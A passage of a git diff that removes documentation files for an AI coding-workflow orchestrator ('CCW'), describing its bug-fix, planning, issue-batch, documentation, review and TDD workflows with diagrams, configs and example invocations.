||||
O->>LF: /workflow:lite-fix --hotfix "bug"
|
||||
|
||||
Note over LF: Minimal Diagnosis
|
||||
LF->>CLI: Quick root cause
|
||||
CLI-->>LF: Known issue?
|
||||
|
||||
Note over LF: Surgical Fix
|
||||
LF->>LF: Single optimal fix
|
||||
LF-->>U: Quick confirmation
|
||||
U->>LF: Proceed
|
||||
|
||||
Note over LF: Smoke Test
|
||||
LF->>CLI: Minimal verification
|
||||
CLI-->>LF: Pass/Fail
|
||||
|
||||
Note over LF: Follow-up Generation
|
||||
LF->>LF: Generate follow-up tasks
|
||||
LF-->>U: Fix deployed + follow-ups created
|
||||
```
|
||||
|
||||
## When to Use
|
||||
|
||||
### Standard Mode (/workflow:lite-fix)
|
||||
✅ **Use for**:
|
||||
- 已知症状的 Bug
|
||||
- 本地化修复(1-5 文件)
|
||||
- 非紧急问题
|
||||
- 需要完整诊断
|
||||
|
||||
### Hotfix Mode (/workflow:lite-fix --hotfix)
|
||||
✅ **Use for**:
|
||||
- 生产事故
|
||||
- 紧急修复
|
||||
- 明确的单点故障
|
||||
- 时间敏感
|
||||
|
||||
❌ **Don't use** (for either mode):
|
||||
- 需要架构变更 → `/workflow:plan --mode bugfix`
|
||||
- 多个相关问题 → `/issue:plan`
|
||||
|
||||
## Severity Classification
|
||||
|
||||
| Score | Severity | Response | Verification |
|
||||
|-------|----------|----------|--------------|
|
||||
| 8-10 | Critical | Immediate | Smoke test only |
|
||||
| 6-7.9 | High | Fast track | Integration tests |
|
||||
| 4-5.9 | Medium | Normal | Full test suite |
|
||||
| 0-3.9 | Low | Scheduled | Comprehensive |
|
||||
|
||||
## Configuration
|
||||
|
||||
```javascript
|
||||
const bugfixConfig = {
|
||||
standard: {
|
||||
diagnosis: {
|
||||
tool: 'gemini',
|
||||
depth: 'comprehensive',
|
||||
timeout: 300000 // 5 min
|
||||
},
|
||||
impact: {
|
||||
riskThreshold: 6.0, // High risk threshold
|
||||
autoEscalate: true
|
||||
},
|
||||
verification: {
|
||||
levels: ['smoke', 'integration', 'full'],
|
||||
autoSelect: true // Based on severity
|
||||
}
|
||||
},
|
||||
|
||||
hotfix: {
|
||||
diagnosis: {
|
||||
tool: 'gemini',
|
||||
depth: 'minimal',
|
||||
timeout: 60000 // 1 min
|
||||
},
|
||||
fix: {
|
||||
strategy: 'single', // Single optimal fix
|
||||
surgical: true
|
||||
},
|
||||
followup: {
|
||||
generate: true,
|
||||
types: ['comprehensive-fix', 'post-mortem']
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Example Invocations
|
||||
|
||||
```bash
|
||||
# Standard bug fix
|
||||
ccw "用户头像上传失败,返回 413 错误"
|
||||
→ lite-fix
|
||||
→ Diagnosis: File size limit in nginx
|
||||
→ Impact: 6.5 (High)
|
||||
→ Fix: Update nginx config + add client validation
|
||||
→ Verify: Integration test
|
||||
|
||||
# Production hotfix
|
||||
ccw "紧急:支付网关返回 5xx 错误,影响所有用户"
|
||||
→ lite-fix --hotfix
|
||||
→ Quick diagnosis: API key expired
|
||||
→ Surgical fix: Rotate key
|
||||
→ Smoke test: Payment flow
|
||||
→ Follow-ups: Key rotation automation, monitoring alert
|
||||
|
||||
# Unknown root cause
|
||||
ccw "购物车随机丢失商品,原因不明"
|
||||
→ lite-fix
|
||||
→ Deep diagnosis (auto)
|
||||
→ Root cause: Race condition in concurrent updates
|
||||
→ Fix: Add optimistic locking
|
||||
→ Verify: Concurrent test suite
|
||||
```
|
||||
|
||||
## Output Artifacts
|
||||
|
||||
```
|
||||
.workflow/.lite-fix/{bug-slug}-{timestamp}/
|
||||
├── diagnosis.json # Root cause analysis
|
||||
├── impact.json # Risk assessment
|
||||
├── fix-plan.json # Fix strategy
|
||||
├── task.json # Enhanced task for execution
|
||||
└── followup.json # Follow-up tasks (hotfix only)
|
||||
```
|
||||
|
||||
## Follow-up Tasks (Hotfix Mode)
|
||||
|
||||
```json
|
||||
{
|
||||
"followups": [
|
||||
{
|
||||
"id": "FOLLOWUP-001",
|
||||
"type": "comprehensive-fix",
|
||||
"title": "Complete fix for payment gateway issue",
|
||||
"due": "3 days",
|
||||
"description": "Implement full solution with proper error handling"
|
||||
},
|
||||
{
|
||||
"id": "FOLLOWUP-002",
|
||||
"type": "post-mortem",
|
||||
"title": "Post-mortem analysis",
|
||||
"due": "1 week",
|
||||
"description": "Document incident and prevention measures"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
@@ -1,194 +0,0 @@
|
||||
# Action: Coupled Workflow
|
||||
|
||||
复杂耦合工作流:完整规划 + 验证 + 执行
|
||||
|
||||
## Pattern
|
||||
|
||||
```
|
||||
plan → action-plan-verify → execute
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- Complexity: High
|
||||
- Keywords: "refactor", "重构", "migrate", "迁移", "architect", "架构"
|
||||
- Cross-module changes
|
||||
- System-level modifications
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant PL as plan
|
||||
participant VF as verify
|
||||
participant EX as execute
|
||||
participant RV as review
|
||||
|
||||
U->>O: Complex task
|
||||
O->>O: Classify: coupled (high complexity)
|
||||
|
||||
Note over PL: Phase 1: Comprehensive Planning
|
||||
O->>PL: /workflow:plan
|
||||
PL->>PL: Multi-phase planning
|
||||
PL->>PL: Generate IMPL_PLAN.md
|
||||
PL->>PL: Generate task JSONs
|
||||
PL-->>U: Present plan
|
||||
|
||||
Note over VF: Phase 2: Verification
|
||||
U->>VF: /workflow:action-plan-verify
|
||||
VF->>VF: Cross-artifact consistency
|
||||
VF->>VF: Dependency validation
|
||||
VF->>VF: Quality gate checks
|
||||
VF-->>U: Verification report
|
||||
|
||||
alt Verification failed
|
||||
U->>PL: Replan with issues
|
||||
else Verification passed
|
||||
Note over EX: Phase 3: Execution
|
||||
U->>EX: /workflow:execute
|
||||
EX->>EX: DAG-based parallel execution
|
||||
EX-->>U: Execution complete
|
||||
end
|
||||
|
||||
Note over RV: Phase 4: Review
|
||||
U->>RV: /workflow:review
|
||||
RV-->>U: Review findings
|
||||
```
|
||||
|
||||
## When to Use
|
||||
|
||||
✅ **Ideal scenarios**:
|
||||
- 大规模重构
|
||||
- 架构迁移
|
||||
- 跨模块功能开发
|
||||
- 技术栈升级
|
||||
- 团队协作项目
|
||||
|
||||
❌ **Avoid when**:
|
||||
- 简单的局部修改
|
||||
- 时间紧迫
|
||||
- 独立的小功能
|
||||
|
||||
## Verification Checks
|
||||
|
||||
| Check | Description | Severity |
|
||||
|-------|-------------|----------|
|
||||
| Dependency Cycles | 检测循环依赖 | Critical |
|
||||
| Missing Tasks | 计划与实际不符 | High |
|
||||
| File Conflicts | 多任务修改同文件 | Medium |
|
||||
| Coverage Gaps | 未覆盖的需求 | Medium |
|
||||
|
||||
## Configuration
|
||||
|
||||
```javascript
|
||||
const coupledConfig = {
|
||||
plan: {
|
||||
phases: 5, // Full 5-phase planning
|
||||
taskGeneration: 'action-planning-agent',
|
||||
outputFormat: {
|
||||
implPlan: '.workflow/plans/IMPL_PLAN.md',
|
||||
taskJsons: '.workflow/tasks/IMPL-*.json'
|
||||
}
|
||||
},
|
||||
|
||||
verify: {
|
||||
required: true, // Always verify before execute
|
||||
autoReplan: false, // Manual replan on failure
|
||||
qualityGates: ['no-cycles', 'no-conflicts', 'complete-coverage']
|
||||
},
|
||||
|
||||
execute: {
|
||||
dagParallel: true,
|
||||
checkpointInterval: 3, // Checkpoint every 3 tasks
|
||||
rollbackOnFailure: true
|
||||
},
|
||||
|
||||
review: {
|
||||
types: ['architecture', 'security'],
|
||||
required: true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Task JSON Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "IMPL-001",
|
||||
"title": "重构认证模块核心逻辑",
|
||||
"scope": "src/auth/**",
|
||||
"action": "refactor",
|
||||
"depends_on": [],
|
||||
"modification_points": [
|
||||
{
|
||||
"file": "src/auth/service.ts",
|
||||
"target": "AuthService",
|
||||
"change": "Extract OAuth2 logic"
|
||||
}
|
||||
],
|
||||
"acceptance": [
|
||||
"所有现有测试通过",
|
||||
"OAuth2 流程可用"
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Example Invocations
|
||||
|
||||
```bash
|
||||
# Architecture refactoring
|
||||
ccw "重构整个认证模块,从 session 迁移到 JWT"
|
||||
→ plan (5 phases)
|
||||
→ verify
|
||||
→ execute
|
||||
|
||||
# System migration
|
||||
ccw "将数据库从 MySQL 迁移到 PostgreSQL"
|
||||
→ plan (migration strategy)
|
||||
→ verify (data integrity checks)
|
||||
→ execute (staged migration)
|
||||
|
||||
# Cross-module feature
|
||||
ccw "实现跨服务的分布式事务支持"
|
||||
→ plan (architectural design)
|
||||
→ verify (consistency checks)
|
||||
→ execute (incremental rollout)
|
||||
```
|
||||
|
||||
## Output Artifacts
|
||||
|
||||
```
|
||||
.workflow/
|
||||
├── plans/
|
||||
│ └── IMPL_PLAN.md # Comprehensive plan
|
||||
├── tasks/
|
||||
│ ├── IMPL-001.json
|
||||
│ ├── IMPL-002.json
|
||||
│ └── ...
|
||||
├── verify/
|
||||
│ └── verification-report.md # Verification results
|
||||
└── reviews/
|
||||
└── {review-type}.md # Review findings
|
||||
```
|
||||
|
||||
## Replan Flow
|
||||
|
||||
When verification fails:
|
||||
|
||||
```javascript
|
||||
if (verificationResult.status === 'failed') {
|
||||
console.log(`
|
||||
## Verification Failed
|
||||
|
||||
**Issues found**:
|
||||
${verificationResult.issues.map(i => `- ${i.severity}: ${i.message}`).join('\n')}
|
||||
|
||||
**Options**:
|
||||
1. /workflow:replan - Address issues and regenerate plan
|
||||
2. /workflow:plan --force - Proceed despite issues (not recommended)
|
||||
3. Review issues manually and fix plan files
|
||||
`)
|
||||
}
|
||||
```
|
||||
@@ -1,93 +0,0 @@
|
||||
# Documentation Workflow Action
|
||||
|
||||
## Pattern
|
||||
```
|
||||
memory:docs → execute (full)
|
||||
memory:update-related (incremental)
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- 关键词: "文档", "documentation", "docs", "readme", "注释"
|
||||
- 变体触发:
|
||||
- `incremental`: "更新", "增量", "相关"
|
||||
- `full`: "全部", "完整", "所有"
|
||||
|
||||
## Variants
|
||||
|
||||
### Full Documentation
|
||||
```mermaid
|
||||
graph TD
|
||||
A[User Input] --> B[memory:docs]
|
||||
B --> C[项目结构分析]
|
||||
C --> D[模块分组 ≤10/task]
|
||||
D --> E[execute: 并行生成]
|
||||
E --> F[README.md]
|
||||
E --> G[ARCHITECTURE.md]
|
||||
E --> H[API Docs]
|
||||
E --> I[Module CLAUDE.md]
|
||||
```
|
||||
|
||||
### Incremental Update
|
||||
```mermaid
|
||||
graph TD
|
||||
A[Git Changes] --> B[memory:update-related]
|
||||
B --> C[变更模块检测]
|
||||
C --> D[相关文档定位]
|
||||
D --> E[增量更新]
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
| 参数 | 默认值 | 说明 |
|
||||
|------|--------|------|
|
||||
| batch_size | 4 | 每agent处理模块数 |
|
||||
| format | markdown | 输出格式 |
|
||||
| include_api | true | 生成API文档 |
|
||||
| include_diagrams | true | 生成Mermaid图 |
|
||||
|
||||
## CLI Integration
|
||||
|
||||
| 阶段 | CLI Hint | 用途 |
|
||||
|------|----------|------|
|
||||
| memory:docs | `gemini --mode analysis` | 项目结构分析 |
|
||||
| execute | `gemini --mode write` | 文档生成 |
|
||||
| update-related | `gemini --mode write` | 增量更新 |
|
||||
|
||||
## Slash Commands
|
||||
|
||||
```bash
|
||||
/memory:docs # 规划全量文档生成
|
||||
/memory:docs-full-cli # CLI执行全量文档
|
||||
/memory:docs-related-cli # CLI执行增量文档
|
||||
/memory:update-related # 更新变更相关文档
|
||||
/memory:update-full # 更新所有CLAUDE.md
|
||||
```
|
||||
|
||||
## Output Structure
|
||||
|
||||
```
|
||||
project/
|
||||
├── README.md # 项目概览
|
||||
├── ARCHITECTURE.md # 架构文档
|
||||
├── docs/
|
||||
│ └── api/ # API文档
|
||||
└── src/
|
||||
└── module/
|
||||
└── CLAUDE.md # 模块文档
|
||||
```
|
||||
|
||||
## When to Use
|
||||
|
||||
- 新项目初始化文档
|
||||
- 大版本发布前文档更新
|
||||
- 代码变更后同步文档
|
||||
- API文档生成
|
||||
|
||||
## Risk Assessment
|
||||
|
||||
| 风险 | 缓解措施 |
|
||||
|------|----------|
|
||||
| 文档与代码不同步 | git hook集成 |
|
||||
| 生成内容过于冗长 | batch_size控制 |
|
||||
| 遗漏重要模块 | 全量扫描验证 |
|
||||
@@ -1,154 +0,0 @@
|
||||
# Action: Full Workflow
|
||||
|
||||
完整探索工作流:分析 + 头脑风暴 + 规划 + 执行
|
||||
|
||||
## Pattern
|
||||
|
||||
```
|
||||
brainstorm:auto-parallel → plan → [verify] → execute
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- Intent: Exploration (uncertainty detected)
|
||||
- Keywords: "不确定", "不知道", "explore", "怎么做", "what if"
|
||||
- No clear implementation path
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant BS as brainstorm
|
||||
participant PL as plan
|
||||
participant VF as verify
|
||||
participant EX as execute
|
||||
|
||||
U->>O: Unclear task
|
||||
O->>O: Classify: full
|
||||
|
||||
Note over BS: Phase 1: Brainstorm
|
||||
O->>BS: /workflow:brainstorm:auto-parallel
|
||||
BS->>BS: Multi-role parallel analysis
|
||||
BS->>BS: Synthesis & recommendations
|
||||
BS-->>U: Present options
|
||||
U->>BS: Select direction
|
||||
|
||||
Note over PL: Phase 2: Plan
|
||||
BS->>PL: /workflow:plan
|
||||
PL->>PL: Generate IMPL_PLAN.md
|
||||
PL->>PL: Generate task JSONs
|
||||
PL-->>U: Review plan
|
||||
|
||||
Note over VF: Phase 3: Verify (optional)
|
||||
U->>VF: /workflow:action-plan-verify
|
||||
VF->>VF: Cross-artifact consistency
|
||||
VF-->>U: Verification report
|
||||
|
||||
Note over EX: Phase 4: Execute
|
||||
U->>EX: /workflow:execute
|
||||
EX->>EX: DAG-based parallel execution
|
||||
EX-->>U: Execution complete
|
||||
```
|
||||
|
||||
## When to Use
|
||||
|
||||
✅ **Ideal scenarios**:
|
||||
- 产品方向探索
|
||||
- 技术选型评估
|
||||
- 架构设计决策
|
||||
- 复杂功能规划
|
||||
- 需要多角色视角
|
||||
|
||||
❌ **Avoid when**:
|
||||
- 任务明确简单
|
||||
- 时间紧迫
|
||||
- 已有成熟方案
|
||||
|
||||
## Brainstorm Roles
|
||||
|
||||
| Role | Focus | Typical Questions |
|
||||
|------|-------|-------------------|
|
||||
| Product Manager | 用户价值、市场定位 | "用户痛点是什么?" |
|
||||
| System Architect | 技术方案、架构设计 | "如何保证可扩展性?" |
|
||||
| UX Expert | 用户体验、交互设计 | "用户流程是否顺畅?" |
|
||||
| Security Expert | 安全风险、合规要求 | "有哪些安全隐患?" |
|
||||
| Data Architect | 数据模型、存储方案 | "数据如何组织?" |
|
||||
|
||||
## Configuration
|
||||
|
||||
```javascript
|
||||
const fullConfig = {
|
||||
brainstorm: {
|
||||
defaultRoles: ['product-manager', 'system-architect', 'ux-expert'],
|
||||
maxRoles: 5,
|
||||
synthesis: true // Always generate synthesis
|
||||
},
|
||||
|
||||
plan: {
|
||||
verifyBeforeExecute: true, // Recommend verification
|
||||
taskFormat: 'json' // Generate task JSONs
|
||||
},
|
||||
|
||||
execute: {
|
||||
dagParallel: true, // DAG-based parallel execution
|
||||
testGeneration: 'optional' // Suggest test-gen after
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Continuation Points
|
||||
|
||||
After each phase, CCW can continue to the next:
|
||||
|
||||
```javascript
|
||||
// After brainstorm completes
|
||||
console.log(`
|
||||
## Brainstorm Complete
|
||||
|
||||
**Next steps**:
|
||||
1. /workflow:plan "基于头脑风暴结果规划实施"
|
||||
2. Or refine: /workflow:brainstorm:synthesis
|
||||
`)
|
||||
|
||||
// After plan completes
|
||||
console.log(`
|
||||
## Plan Complete
|
||||
|
||||
**Next steps**:
|
||||
1. /workflow:action-plan-verify (recommended)
|
||||
2. /workflow:execute (直接执行)
|
||||
`)
|
||||
```
|
||||
|
||||
## Example Invocations
|
||||
|
||||
```bash
|
||||
# Product exploration
|
||||
ccw "我想做一个团队协作工具,但不确定具体方向"
|
||||
→ brainstorm:auto-parallel (5 roles)
|
||||
→ plan
|
||||
→ execute
|
||||
|
||||
# Technical exploration
|
||||
ccw "如何设计一个高可用的消息队列系统?"
|
||||
→ brainstorm:auto-parallel (system-architect, data-architect)
|
||||
→ plan
|
||||
→ verify
|
||||
→ execute
|
||||
```
|
||||
|
||||
## Output Artifacts
|
||||
|
||||
```
|
||||
.workflow/
|
||||
├── brainstorm/
|
||||
│ ├── {session}/
|
||||
│ │ ├── role-{role}.md
|
||||
│ │ └── synthesis.md
|
||||
├── plans/
|
||||
│ └── IMPL_PLAN.md
|
||||
└── tasks/
|
||||
└── IMPL-*.json
|
||||
```
|
||||
@@ -1,201 +0,0 @@
|
||||
# Action: Issue Workflow
|
||||
|
||||
Issue 批量处理工作流:规划 + 队列 + 批量执行
|
||||
|
||||
## Pattern
|
||||
|
||||
```
|
||||
issue:plan → issue:queue → issue:execute
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- Keywords: "issues", "batch", "queue", "多个", "批量"
|
||||
- Multiple related problems
|
||||
- Long-running fix campaigns
|
||||
- Priority-based processing needed
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant IP as issue:plan
|
||||
participant IQ as issue:queue
|
||||
participant IE as issue:execute
|
||||
|
||||
U->>O: Multiple issues / batch fix
|
||||
O->>O: Classify: issue
|
||||
|
||||
Note over IP: Phase 1: Issue Planning
|
||||
O->>IP: /issue:plan
|
||||
IP->>IP: Load unplanned issues
|
||||
IP->>IP: Generate solutions per issue
|
||||
IP->>U: Review solutions
|
||||
U->>IP: Bind selected solutions
|
||||
|
||||
Note over IQ: Phase 2: Queue Formation
|
||||
IP->>IQ: /issue:queue
|
||||
IQ->>IQ: Conflict analysis
|
||||
IQ->>IQ: Priority calculation
|
||||
IQ->>IQ: DAG construction
|
||||
IQ->>U: High-severity conflicts?
|
||||
U->>IQ: Resolve conflicts
|
||||
IQ->>IQ: Generate execution queue
|
||||
|
||||
Note over IE: Phase 3: Execution
|
||||
IQ->>IE: /issue:execute
|
||||
IE->>IE: DAG-based parallel execution
|
||||
IE->>IE: Per-solution progress tracking
|
||||
IE-->>U: Batch execution complete
|
||||
```
|
||||
|
||||
## When to Use
|
||||
|
||||
✅ **Ideal scenarios**:
|
||||
- 多个相关 Bug 需要批量修复
|
||||
- GitHub Issues 批量处理
|
||||
- 技术债务清理
|
||||
- 安全漏洞批量修复
|
||||
- 代码质量改进活动
|
||||
|
||||
❌ **Avoid when**:
|
||||
- 单一问题 → `/workflow:lite-fix`
|
||||
- 独立不相关的任务 → 分别处理
|
||||
- 紧急生产问题 → `/workflow:lite-fix --hotfix`
|
||||
|
||||
## Issue Lifecycle
|
||||
|
||||
```
|
||||
draft → planned → queued → executing → completed
|
||||
↓ ↓
|
||||
skipped on-hold
|
||||
```
|
||||
|
||||
## Conflict Types
|
||||
|
||||
| Type | Description | Resolution |
|
||||
|------|-------------|------------|
|
||||
| File | 多个解决方案修改同一文件 | Sequential execution |
|
||||
| API | API 签名变更影响 | Dependency ordering |
|
||||
| Data | 数据结构变更冲突 | User decision |
|
||||
| Dependency | 包依赖冲突 | Version negotiation |
|
||||
| Architecture | 架构方向冲突 | User decision (high severity) |
|
||||
|
||||
## Configuration
|
||||
|
||||
```javascript
|
||||
const issueConfig = {
|
||||
plan: {
|
||||
solutionsPerIssue: 3, // Generate up to 3 solutions
|
||||
autoSelect: false, // User must bind solution
|
||||
planningAgent: 'issue-plan-agent'
|
||||
},
|
||||
|
||||
queue: {
|
||||
conflictAnalysis: true,
|
||||
priorityCalculation: true,
|
||||
clarifyThreshold: 'high', // Ask user for high-severity conflicts
|
||||
queueAgent: 'issue-queue-agent'
|
||||
},
|
||||
|
||||
execute: {
|
||||
dagParallel: true,
|
||||
executionLevel: 'solution', // Execute by solution, not task
|
||||
executor: 'codex',
|
||||
resumable: true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Example Invocations
|
||||
|
||||
```bash
|
||||
# From GitHub Issues
|
||||
ccw "批量处理所有 label:bug 的 GitHub Issues"
|
||||
→ issue:new (import from GitHub)
|
||||
→ issue:plan (generate solutions)
|
||||
→ issue:queue (form execution queue)
|
||||
→ issue:execute (batch execute)
|
||||
|
||||
# Tech debt cleanup
|
||||
ccw "处理所有 TODO 注释和已知技术债务"
|
||||
→ issue:discover (find issues)
|
||||
→ issue:plan (plan solutions)
|
||||
→ issue:queue (prioritize)
|
||||
→ issue:execute (execute)
|
||||
|
||||
# Security vulnerabilities
|
||||
ccw "修复所有 npm audit 报告的安全漏洞"
|
||||
→ issue:new (from audit report)
|
||||
→ issue:plan (upgrade strategies)
|
||||
→ issue:queue (conflict resolution)
|
||||
→ issue:execute (staged upgrades)
|
||||
```
|
||||
|
||||
## Queue Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"queue_id": "QUE-20251227-143000",
|
||||
"status": "active",
|
||||
"execution_groups": [
|
||||
{
|
||||
"id": "P1",
|
||||
"type": "parallel",
|
||||
"solutions": ["SOL-ISS-001-1", "SOL-ISS-002-1"],
|
||||
"description": "Independent fixes, no file overlap"
|
||||
},
|
||||
{
|
||||
"id": "S1",
|
||||
"type": "sequential",
|
||||
"solutions": ["SOL-ISS-003-1"],
|
||||
"depends_on": ["P1"],
|
||||
"description": "Depends on P1 completion"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Output Artifacts
|
||||
|
||||
```
|
||||
.workflow/issues/
|
||||
├── issues.jsonl # All issues (one per line)
|
||||
├── solutions/
|
||||
│ ├── ISS-001.jsonl # Solutions for ISS-001
|
||||
│ └── ISS-002.jsonl
|
||||
├── queues/
|
||||
│ ├── index.json # Queue index
|
||||
│ └── QUE-xxx.json # Queue details
|
||||
└── execution/
|
||||
└── {queue-id}/
|
||||
├── progress.json
|
||||
└── results/
|
||||
```
|
||||
|
||||
## Progress Tracking
|
||||
|
||||
```javascript
|
||||
// Real-time progress during execution
|
||||
const progress = {
|
||||
queue_id: "QUE-xxx",
|
||||
total_solutions: 5,
|
||||
completed: 2,
|
||||
in_progress: 1,
|
||||
pending: 2,
|
||||
current_group: "P1",
|
||||
eta: "15 minutes"
|
||||
}
|
||||
```
|
||||
|
||||
## Resume Capability
|
||||
|
||||
```bash
|
||||
# If execution interrupted
|
||||
ccw "继续执行 issue 队列"
|
||||
→ Detects active queue: QUE-xxx
|
||||
→ Resumes from last checkpoint
|
||||
→ /issue:execute --resume
|
||||
```
|
||||
@@ -1,104 +0,0 @@
|
||||
# Action: Rapid Workflow
|
||||
|
||||
快速迭代工作流组合:多模型协作分析 + 直接执行
|
||||
|
||||
## Pattern
|
||||
|
||||
```
|
||||
lite-plan → lite-execute
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- Complexity: Low to Medium
|
||||
- Intent: Feature development
|
||||
- Context: Clear requirements, known implementation path
|
||||
- No uncertainty keywords
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant O as CCW Orchestrator
|
||||
participant LP as lite-plan
|
||||
participant LE as lite-execute
|
||||
participant CLI as CLI Tools
|
||||
|
||||
U->>O: Task description
|
||||
O->>O: Classify: rapid
|
||||
O->>LP: /workflow:lite-plan "task"
|
||||
|
||||
LP->>LP: Complexity assessment
|
||||
LP->>CLI: Parallel explorations (if needed)
|
||||
CLI-->>LP: Exploration results
|
||||
LP->>LP: Generate plan.json
|
||||
LP->>U: Display plan, ask confirmation
|
||||
U->>LP: Confirm + select execution method
|
||||
|
||||
LP->>LE: /workflow:lite-execute --in-memory
|
||||
LE->>CLI: Execute tasks (Agent/Codex)
|
||||
CLI-->>LE: Results
|
||||
LE->>LE: Optional code review
|
||||
LE-->>U: Execution complete
|
||||
```
|
||||
|
||||
## When to Use
|
||||
|
||||
✅ **Ideal scenarios**:
|
||||
- 添加单一功能(如用户头像上传)
|
||||
- 修改现有功能(如更新表单验证)
|
||||
- 小型重构(如抽取公共方法)
|
||||
- 添加测试用例
|
||||
- 文档更新
|
||||
|
||||
❌ **Avoid when**:
|
||||
- 不确定实现方案
|
||||
- 跨多个模块
|
||||
- 需要架构决策
|
||||
- 有复杂依赖关系
|
||||
|
||||
## Configuration
|
||||
|
||||
```javascript
|
||||
const rapidConfig = {
|
||||
explorationThreshold: {
|
||||
// Force exploration if task mentions specific files
|
||||
forceExplore: /\b(file|文件|module|模块|class|类)\s*[::]?\s*\w+/i,
|
||||
// Skip exploration for simple tasks
|
||||
skipExplore: /\b(add|添加|create|创建)\s+(comment|注释|log|日志)/i
|
||||
},
|
||||
|
||||
defaultExecution: 'Agent', // Agent for low complexity
|
||||
|
||||
codeReview: {
|
||||
default: 'Skip', // Skip review for simple tasks
|
||||
threshold: 'medium' // Enable for medium+ complexity
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Example Invocations
|
||||
|
||||
```bash
|
||||
# Simple feature
|
||||
ccw "添加用户退出登录按钮"
|
||||
→ lite-plan → lite-execute (Agent)
|
||||
|
||||
# With exploration
|
||||
ccw "优化 AuthService 的 token 刷新逻辑"
|
||||
→ lite-plan -e → lite-execute (Agent, Gemini review)
|
||||
|
||||
# Medium complexity
|
||||
ccw "实现用户偏好设置的本地存储"
|
||||
→ lite-plan -e → lite-execute (Codex)
|
||||
```
|
||||
|
||||
## Output Artifacts
|
||||
|
||||
```
|
||||
.workflow/.lite-plan/{task-slug}-{date}/
|
||||
├── exploration-*.json # If exploration was triggered
|
||||
├── explorations-manifest.json
|
||||
└── plan.json # Implementation plan
|
||||
```
|
||||
@@ -1,84 +0,0 @@
|
||||
# Review-Fix Workflow Action
|
||||
|
||||
## Pattern
|
||||
```
|
||||
review-session-cycle → review-fix
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- 关键词: "review", "审查", "检查代码", "code review", "质量检查"
|
||||
- 场景: PR审查、代码质量提升、安全审计
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
graph TD
|
||||
A[User Input] --> B[review-session-cycle]
|
||||
B --> C{7维度分析}
|
||||
C --> D[Security]
|
||||
C --> E[Performance]
|
||||
C --> F[Maintainability]
|
||||
C --> G[Architecture]
|
||||
C --> H[Code Style]
|
||||
C --> I[Test Coverage]
|
||||
C --> J[Documentation]
|
||||
D & E & F & G & H & I & J --> K[Findings Aggregation]
|
||||
K --> L{Quality Gate}
|
||||
L -->|Pass| M[Report Only]
|
||||
L -->|Fail| N[review-fix]
|
||||
N --> O[Auto Fix]
|
||||
O --> P[Re-verify]
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
| 参数 | 默认值 | 说明 |
|
||||
|------|--------|------|
|
||||
| dimensions | all | 审查维度(security,performance,etc.) |
|
||||
| quality_gate | 80 | 质量门槛分数 |
|
||||
| auto_fix | true | 自动修复发现的问题 |
|
||||
| severity_threshold | medium | 最低关注级别 |
|
||||
|
||||
## CLI Integration
|
||||
|
||||
| 阶段 | CLI Hint | 用途 |
|
||||
|------|----------|------|
|
||||
| review-session-cycle | `gemini --mode analysis` | 多维度深度分析 |
|
||||
| review-fix | `codex --mode write` | 自动修复问题 |
|
||||
|
||||
## Slash Commands
|
||||
|
||||
```bash
|
||||
/workflow:review-session-cycle # 会话级代码审查
|
||||
/workflow:review-module-cycle # 模块级代码审查
|
||||
/workflow:review-fix # 自动修复审查发现
|
||||
/workflow:review --type security # 专项安全审查
|
||||
```
|
||||
|
||||
## Review Dimensions
|
||||
|
||||
| 维度 | 检查点 |
|
||||
|------|--------|
|
||||
| Security | 注入、XSS、敏感数据暴露 |
|
||||
| Performance | N+1查询、内存泄漏、算法复杂度 |
|
||||
| Maintainability | 代码重复、复杂度、命名 |
|
||||
| Architecture | 依赖方向、层级违规、耦合度 |
|
||||
| Code Style | 格式、约定、一致性 |
|
||||
| Test Coverage | 覆盖率、边界用例 |
|
||||
| Documentation | 注释、API文档、README |
|
||||
|
||||
## When to Use
|
||||
|
||||
- PR合并前审查
|
||||
- 重构后质量验证
|
||||
- 安全合规审计
|
||||
- 技术债务评估
|
||||
|
||||
## Risk Assessment
|
||||
|
||||
| 风险 | 缓解措施 |
|
||||
|------|----------|
|
||||
| 误报过多 | severity_threshold过滤 |
|
||||
| 修复引入新问题 | re-verify循环 |
|
||||
| 审查不全面 | 7维度覆盖 |
|
||||
@@ -1,66 +0,0 @@
|
||||
# TDD Workflow Action
|
||||
|
||||
## Pattern
|
||||
```
|
||||
tdd-plan → execute → tdd-verify
|
||||
```
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- 关键词: "tdd", "test-driven", "测试驱动", "先写测试", "red-green"
|
||||
- 场景: 需要高质量代码保证、关键业务逻辑、回归风险高
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
graph TD
|
||||
A[User Input] --> B[tdd-plan]
|
||||
B --> C{生成测试任务链}
|
||||
C --> D[Red Phase: 写失败测试]
|
||||
D --> E[execute: 实现代码]
|
||||
